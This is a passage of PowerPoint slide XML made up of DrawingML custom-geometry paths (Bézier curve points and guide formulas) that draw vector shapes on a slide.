                    <a:pt x="24" y="9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9"/>
                    <a:pt x="19" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="8"/>
                    <a:pt x="20" y="7"/>
                    <a:pt x="20" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="5"/>
                    <a:pt x="20" y="4"/>
                    <a:pt x="20" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="3"/>
                    <a:pt x="20" y="2"/>
                    <a:pt x="20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0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="23" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="25" y="0"/>
                    <a:pt x="25" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="25" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="24"/>
                    <a:pt x="24" y="25"/>
                    <a:pt x="23" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="27"/>
                    <a:pt x="22" y="28"/>
                    <a:pt x="22" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="29"/>
                    <a:pt x="21" y="29"/>
                    <a:pt x="22" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="29"/>
                    <a:pt x="22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31"/>
                    <a:pt x="18" y="32"/>
                    <a:pt x="15" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="35"/>
                    <a:pt x="9" y="36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0"/>
                    <a:pt x="10" y="40"/>
                    <a:pt x="10" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="38"/>
                    <a:pt x="15" y="37"/>
                    <a:pt x="17" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="35"/>
                    <a:pt x="22" y="33"/>
                    <a:pt x="24" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="33"/>
                    <a:pt x="24" y="33"/>
                    <a:pt x="24" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="34"/>
                    <a:pt x="25" y="35"/>
                    <a:pt x="25" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="35"/>
                    <a:pt x="25" y="35"/>
                    <a:pt x="25" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="36"/>
                    <a:pt x="26" y="37"/>
                    <a:pt x="26" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="37"/>
                    <a:pt x="25" y="37"/>
                    <a:pt x="25" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="38"/>
                    <a:pt x="24" y="38"/>
                    <a:pt x="24" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="38"/>
                    <a:pt x="23" y="38"/>
                    <a:pt x="23" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="38"/>
                    <a:pt x="23" y="39"/>
                    <a:pt x="23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4" y="40"/>
                    <a:pt x="25" y="40"/>
                    <a:pt x="25" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="41"/>
                    <a:pt x="26" y="41"/>
                    <a:pt x="26" y="40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9" y="39"/>
                    <a:pt x="29" y="39"/>
                    <a:pt x="29" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="38"/>
                    <a:pt x="30" y="37"/>
                    <a:pt x="30" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="36"/>
                    <a:pt x="30" y="35"/>
                    <a:pt x="29" y="35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8" y="22"/>
                    <a:pt x="36" y="23"/>
                    <a:pt x="33" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="26"/>
                    <a:pt x="28" y="27"/>
                    <a:pt x="26" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="26"/>
                    <a:pt x="28" y="25"/>
                    <a:pt x="28" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="22"/>
                    <a:pt x="30" y="20"/>
                    <a:pt x="30" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="18"/>
                    <a:pt x="30" y="17"/>
                    <a:pt x="29" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="16"/>
                    <a:pt x="28" y="16"/>
                    <a:pt x="28" y="16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1" y="20"/>
                    <a:pt x="20" y="21"/>
                    <a:pt x="18" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="22"/>
                    <a:pt x="15" y="23"/>
                    <a:pt x="13" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="25"/>
                    <a:pt x="10" y="26"/>
                    <a:pt x="9" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="26"/>
                    <a:pt x="8" y="26"/>
                    <a:pt x="9" y="27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1" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="30"/>
                    <a:pt x="11" y="29"/>
                    <a:pt x="11" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="29"/>
                    <a:pt x="13" y="28"/>
                    <a:pt x="14" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="26"/>
                    <a:pt x="18" y="25"/>
                    <a:pt x="20" y="25"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25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ṡlíḓe"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3178577" y="2608530"/>
              <a:ext cx="1603290" cy="1083856"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 41 w 497"/>
                <a:gd name="T1" fmla="*/ 282 h 335"/>
                <a:gd name="T2" fmla="*/ 37 w 497"/>
                <a:gd name="T3" fmla="*/ 306 h 335"/>
                <a:gd name="T4" fmla="*/ 50 w 497"/>
                <a:gd name="T5" fmla="*/ 317 h 335"/>
                <a:gd name="T6" fmla="*/ 46 w 497"/>
                <a:gd name="T7" fmla="*/ 300 h 335"/>
                <a:gd name="T8" fmla="*/ 40 w 497"/>
                <a:gd name="T9" fmla="*/ 273 h 335"/>
                <a:gd name="T10" fmla="*/ 2 w 497"/>
                <a:gd name="T11" fmla="*/ 219 h 335"/>
                <a:gd name="T12" fmla="*/ 1 w 497"/>
                <a:gd name="T13" fmla="*/ 241 h 335"/>
                <a:gd name="T14" fmla="*/ 7 w 497"/>
                <a:gd name="T15" fmla="*/ 246 h 335"/>
                <a:gd name="T16" fmla="*/ 41 w 497"/>
                <a:gd name="T17" fmla="*/ 213 h 335"/>
                <a:gd name="T18" fmla="*/ 18 w 497"/>
                <a:gd name="T19" fmla="*/ 177 h 335"/>
                <a:gd name="T20" fmla="*/ 15 w 497"/>
                <a:gd name="T21" fmla="*/ 187 h 335"/>
                <a:gd name="T22" fmla="*/ 46 w 497"/>
                <a:gd name="T23" fmla="*/ 147 h 335"/>
                <a:gd name="T24" fmla="*/ 38 w 497"/>
                <a:gd name="T25" fmla="*/ 162 h 335"/>
                <a:gd name="T26" fmla="*/ 58 w 497"/>
                <a:gd name="T27" fmla="*/ 162 h 335"/>
                <a:gd name="T28" fmla="*/ 63 w 497"/>
                <a:gd name="T29" fmla="*/ 84 h 335"/>
                <a:gd name="T30" fmla="*/ 76 w 497"/>
                <a:gd name="T31" fmla="*/ 114 h 335"/>
                <a:gd name="T32" fmla="*/ 65 w 497"/>
                <a:gd name="T33" fmla="*/ 118 h 335"/>
                <a:gd name="T34" fmla="*/ 63 w 497"/>
                <a:gd name="T35" fmla="*/ 84 h 335"/>
                <a:gd name="T36" fmla="*/ 91 w 497"/>
                <a:gd name="T37" fmla="*/ 65 h 335"/>
                <a:gd name="T38" fmla="*/ 90 w 497"/>
                <a:gd name="T39" fmla="*/ 57 h 335"/>
                <a:gd name="T40" fmla="*/ 107 w 497"/>
                <a:gd name="T41" fmla="*/ 43 h 335"/>
                <a:gd name="T42" fmla="*/ 140 w 497"/>
                <a:gd name="T43" fmla="*/ 68 h 335"/>
                <a:gd name="T44" fmla="*/ 138 w 497"/>
                <a:gd name="T45" fmla="*/ 25 h 335"/>
                <a:gd name="T46" fmla="*/ 164 w 497"/>
                <a:gd name="T47" fmla="*/ 14 h 335"/>
                <a:gd name="T48" fmla="*/ 193 w 497"/>
                <a:gd name="T49" fmla="*/ 45 h 335"/>
                <a:gd name="T50" fmla="*/ 198 w 497"/>
                <a:gd name="T51" fmla="*/ 27 h 335"/>
                <a:gd name="T52" fmla="*/ 195 w 497"/>
                <a:gd name="T53" fmla="*/ 12 h 335"/>
                <a:gd name="T54" fmla="*/ 193 w 497"/>
                <a:gd name="T55" fmla="*/ 45 h 335"/>
                <a:gd name="T56" fmla="*/ 242 w 497"/>
                <a:gd name="T57" fmla="*/ 16 h 335"/>
                <a:gd name="T58" fmla="*/ 244 w 497"/>
                <a:gd name="T59" fmla="*/ 23 h 335"/>
                <a:gd name="T60" fmla="*/ 256 w 497"/>
                <a:gd name="T61" fmla="*/ 29 h 335"/>
                <a:gd name="T62" fmla="*/ 257 w 497"/>
                <a:gd name="T63" fmla="*/ 9 h 335"/>
                <a:gd name="T64" fmla="*/ 236 w 497"/>
                <a:gd name="T65" fmla="*/ 38 h 335"/>
                <a:gd name="T66" fmla="*/ 269 w 497"/>
                <a:gd name="T67" fmla="*/ 12 h 335"/>
                <a:gd name="T68" fmla="*/ 280 w 497"/>
                <a:gd name="T69" fmla="*/ 35 h 335"/>
                <a:gd name="T70" fmla="*/ 297 w 497"/>
                <a:gd name="T71" fmla="*/ 31 h 335"/>
                <a:gd name="T72" fmla="*/ 285 w 497"/>
                <a:gd name="T73" fmla="*/ 8 h 335"/>
                <a:gd name="T74" fmla="*/ 314 w 497"/>
                <a:gd name="T75" fmla="*/ 8 h 335"/>
                <a:gd name="T76" fmla="*/ 330 w 497"/>
                <a:gd name="T77" fmla="*/ 20 h 335"/>
                <a:gd name="T78" fmla="*/ 348 w 497"/>
                <a:gd name="T79" fmla="*/ 27 h 335"/>
                <a:gd name="T80" fmla="*/ 330 w 497"/>
                <a:gd name="T81" fmla="*/ 20 h 335"/>
                <a:gd name="T82" fmla="*/ 379 w 497"/>
                <a:gd name="T83" fmla="*/ 36 h 335"/>
                <a:gd name="T84" fmla="*/ 374 w 497"/>
                <a:gd name="T85" fmla="*/ 64 h 335"/>
                <a:gd name="T86" fmla="*/ 430 w 497"/>
                <a:gd name="T87" fmla="*/ 107 h 335"/>
                <a:gd name="T88" fmla="*/ 427 w 497"/>
                <a:gd name="T89" fmla="*/ 84 h 335"/>
                <a:gd name="T90" fmla="*/ 427 w 497"/>
                <a:gd name="T91" fmla="*/ 84 h 335"/>
                <a:gd name="T92" fmla="*/ 466 w 497"/>
                <a:gd name="T93" fmla="*/ 128 h 335"/>
                <a:gd name="T94" fmla="*/ 453 w 497"/>
                <a:gd name="T95" fmla="*/ 135 h 335"/>
                <a:gd name="T96" fmla="*/ 477 w 497"/>
                <a:gd name="T97" fmla="*/ 187 h 335"/>
                <a:gd name="T98" fmla="*/ 464 w 497"/>
                <a:gd name="T99" fmla="*/ 191 h 335"/>
                <a:gd name="T100" fmla="*/ 479 w 497"/>
                <a:gd name="T101" fmla="*/ 169 h 335"/>
                <a:gd name="T102" fmla="*/ 472 w 497"/>
                <a:gd name="T103" fmla="*/ 207 h 335"/>
                <a:gd name="T104" fmla="*/ 497 w 497"/>
                <a:gd name="T105" fmla="*/ 225 h 335"/>
                <a:gd name="T106" fmla="*/ 493 w 497"/>
                <a:gd name="T107" fmla="*/ 203 h 335"/>
                <a:gd name="T108" fmla="*/ 497 w 497"/>
                <a:gd name="T109" fmla="*/ 249 h 335"/>
                <a:gd name="T110" fmla="*/ 497 w 497"/>
                <a:gd name="T111" fmla="*/ 249 h 335"/>
                <a:gd name="T112" fmla="*/ 463 w 497"/>
                <a:gd name="T113" fmla="*/ 287 h 335"/>
                <a:gd name="T114" fmla="*/ 458 w 497"/>
                <a:gd name="T115" fmla="*/ 260 h 335"/>
                <a:gd name="T116" fmla="*/ 456 w 497"/>
                <a:gd name="T117" fmla="*/ 282 h 335"/>
                <a:gd name="T118" fmla="*/ 451 w 497"/>
                <a:gd name="T119" fmla="*/ 327 h 335"/>
                <a:gd name="T120" fmla="*/ 484 w 497"/>
                <a:gd name="T121" fmla="*/ 326 h 335"/>
                <a:gd name="T122" fmla="*/ 475 w 497"/>
                <a:gd name="T123" fmla="*/ 328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7" h="335">
                  <a:moveTo>
                    <a:pt x="11" y="298"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="298"/>
                    <a:pt x="12" y="298"/>
                    <a:pt x="12" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="290"/>
                    <a:pt x="43" y="290"/>
                    <a:pt x="43" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="282"/>
                    <a:pt x="41" y="282"/>
                    <a:pt x="41" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="292"/>
                    <a:pt x="4" y="292"/>
                    <a:pt x="4" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="305"/>
                    <a:pt x="8" y="305"/>
                    <a:pt x="8" y="305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12" y="321"/>
                    <a:pt x="12" y="321"/>
                    <a:pt x="12" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="334"/>
                    <a:pt x="15" y="334"/>
                    <a:pt x="15" y="334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="324"/>
                    <a:pt x="52" y="324"/>
                    <a:pt x="52" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="317"/>
                    <a:pt x="50" y="317"/>
                    <a:pt x="50" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="325"/>
                    <a:pt x="19" y="325"/>
                    <a:pt x="19" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="325"/>
                    <a:pt x="18" y="325"/>
                    <a:pt x="18" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="307"/>
                    <a:pt x="48" y="307"/>
                    <a:pt x="48" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="300"/>
                    <a:pt x="46" y="300"/>
                    <a:pt x="46" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="298"/>
                    <a:pt x="11" y="298"/>
                    <a:pt x="11" y="298"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2" y="268"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="277"/>
                    <a:pt x="3" y="277"/>
                    <a:pt x="3" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="273"/>
                    <a:pt x="40" y="273"/>
                    <a:pt x="40" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="264"/>
                    <a:pt x="40" y="264"/>
                    <a:pt x="40" y="264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="268"/>
                    <a:pt x="2" y="268"/>
                    <a:pt x="2" y="268"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="40" y="221"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="219"/>
                    <a:pt x="2" y="219"/>
                    <a:pt x="2" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="227"/>
                    <a:pt x="2" y="227"/>
                    <a:pt x="2" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="228"/>
                    <a:pt x="31" y="228"/>
                    <a:pt x="31" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="228"/>
                    <a:pt x="32" y="228"/>
                    <a:pt x="32" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="241"/>
                    <a:pt x="1" y="241"/>
                    <a:pt x="1" y="241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39" y="255"/>
                    <a:pt x="39" y="255"/>
                    <a:pt x="39" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="247"/>
                    <a:pt x="39" y="247"/>
                    <a:pt x="39" y="247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="246"/>
                    <a:pt x="7" y="246"/>
                    <a:pt x="7" y="246"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="246"/>
                    <a:pt x="7" y="246"/>
                    <a:pt x="7" y="246"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="232"/>
                    <a:pt x="39" y="232"/>
                    <a:pt x="39" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="221"/>
                    <a:pt x="40" y="221"/>
                    <a:pt x="40" y="221"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="41" y="213"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="185"/>
                    <a:pt x="48" y="185"/>
                    <a:pt x="48" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="183"/>
                    <a:pt x="42" y="183"/>
                    <a:pt x="42" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="202"/>
                    <a:pt x="38" y="202"/>
                    <a:pt x="38" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="177"/>
                    <a:pt x="18" y="177"/>
                    <a:pt x="18" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="176"/>
                    <a:pt x="11" y="176"/>
                    <a:pt x="11" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="203"/>
                    <a:pt x="5" y="203"/>
                    <a:pt x="5" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="204"/>
                    <a:pt x="11" y="204"/>
                    <a:pt x="11" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="187"/>
                    <a:pt x="15" y="187"/>
                    <a:pt x="15" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="212"/>
                    <a:pt x="35" y="212"/>
                    <a:pt x="35" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="213"/>
                    <a:pt x="41" y="213"/>
                    <a:pt x="41" y="213"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="27" y="138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50" y="148"/>
                    <a:pt x="52" y="150"/>
                    <a:pt x="53" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="154"/>
                    <a:pt x="54" y="156"/>
                    <a:pt x="53" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="162"/>
                    <a:pt x="50" y="164"/>
                    <a:pt x="48" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="165"/>
                    <a:pt x="43" y="164"/>
                    <a:pt x="38" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="153"/>
                    <a:pt x="20" y="153"/>
                    <a:pt x="20" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="160"/>
                    <a:pt x="16" y="160"/>
                    <a:pt x="16" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="170"/>
                    <a:pt x="38" y="170"/>
                    <a:pt x="38" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="174"/>
                    <a:pt x="53" y="171"/>
                    <a:pt x="58" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="152"/>
                    <a:pt x="60" y="145"/>
                    <a:pt x="52" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="130"/>
                    <a:pt x="30" y="130"/>
                    <a:pt x="30" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="138"/>
                    <a:pt x="27" y="138"/>
                    <a:pt x="27" y="138"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="63" y="84"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="97"/>
                    <a:pt x="79" y="97"/>
                    <a:pt x="79" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="100"/>
                    <a:pt x="84" y="102"/>
                    <a:pt x="85" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="106"/>
                    <a:pt x="85" y="108"/>
                    <a:pt x="83" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="113"/>
                    <a:pt x="79" y="114"/>
                    <a:pt x="76" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="114"/>
                    <a:pt x="72" y="113"/>
                    <a:pt x="68" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="97"/>
                    <a:pt x="52" y="97"/>
                    <a:pt x="52" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="103"/>
                    <a:pt x="47" y="103"/>
                    <a:pt x="47" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="118"/>
                    <a:pt x="65" y="118"/>
                    <a:pt x="65" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="124"/>
                    <a:pt x="80" y="123"/>
                    <a:pt x="87" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="106"/>
                    <a:pt x="93" y="99"/>
                    <a:pt x="86" y="92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63" y="84"/>
                    <a:pt x="63" y="84"/>
                    <a:pt x="63" y="84"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="132" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="80"/>
                    <a:pt x="123" y="80"/>
                    <a:pt x="123" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="65"/>
                    <a:pt x="91" y="65"/>
                    <a:pt x="91" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="65"/>
                    <a:pt x="91" y="65"/>
                    <a:pt x="91" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="90"/>
                    <a:pt x="111" y="90"/>
                    <a:pt x="111" y="90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1" y="65"/>
                    <a:pt x="81" y="65"/>
                    <a:pt x="81" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="57"/>
                    <a:pt x="90" y="57"/>
                    <a:pt x="90" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="71"/>
                    <a:pt x="120" y="71"/>
                    <a:pt x="120" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="71"/>
                    <a:pt x="120" y="71"/>
                    <a:pt x="120" y="71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32" y="73"/>
                    <a:pt x="132" y="73"/>
                    <a:pt x="132" y="73"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="129" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="35"/>
                    <a:pt x="121" y="35"/>
                    <a:pt x="121" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="68"/>
                    <a:pt x="140" y="68"/>
                    <a:pt x="140" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="64"/>
                    <a:pt x="147" y="64"/>
                    <a:pt x="147" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="31"/>
                    <a:pt x="129" y="31"/>
                    <a:pt x="129" y="31"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="165" y="55"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="25"/>
                    <a:pt x="138" y="25"/>
                    <a:pt x="138" y="25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67" y="45"/>
                    <a:pt x="167" y="45"/>
                    <a:pt x="167" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="14"/>
                    <a:pt x="164" y="14"/>
                    <a:pt x="164" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="11"/>
                    <a:pt x="172" y="11"/>
                    <a:pt x="172" y="11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65" y="55"/>
                    <a:pt x="165" y="55"/>
                    <a:pt x="165" y="55"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="193" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="40"/>
                    <a:pt x="219" y="40"/>
                    <a:pt x="219" y="40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00" y="37"/>
                    <a:pt x="200" y="37"/>
                    <a:pt x="200" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="27"/>
                    <a:pt x="198" y="27"/>
                    <a:pt x="198" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="24"/>
                    <a:pt x="213" y="24"/>
                    <a:pt x="213" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="18"/>
                    <a:pt x="212" y="18"/>
                    <a:pt x="212" y="18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95" y="12"/>
                    <a:pt x="195" y="12"/>
                    <a:pt x="195" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="9"/>
                    <a:pt x="211" y="9"/>
                    <a:pt x="211" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="3"/>
                    <a:pt x="210" y="3"/>
                    <a:pt x="210" y="3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93" y="45"/>
                    <a:pt x="193" y="45"/>
                    <a:pt x="193" y="45"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="235" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="242" y="6"/>
                    <a:pt x="242" y="6"/>
                    <a:pt x="242" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="6"/>
                    <a:pt x="248" y="7"/>
                    <a:pt x="248" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="14"/>
                    <a:pt x="246" y="16"/>
                    <a:pt x="242" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="16"/>
                    <a:pt x="236" y="16"/>
                    <a:pt x="236" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="6"/>
                    <a:pt x="235" y="6"/>
                    <a:pt x="235" y="6"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="236" y="23"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="23"/>
                    <a:pt x="244" y="23"/>
                    <a:pt x="244" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="23"/>
                    <a:pt x="248" y="24"/>
                    <a:pt x="248" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="31"/>
                    <a:pt x="249" y="34"/>
                    <a:pt x="249" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="258" y="38"/>
                    <a:pt x="258" y="38"/>
                    <a:pt x="258" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257" y="36"/>
                    <a:pt x="257" y="33"/>
                    <a:pt x="256" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="28"/>
                    <a:pt x="256" y="28"/>
                    <a:pt x="256" y="27"/>
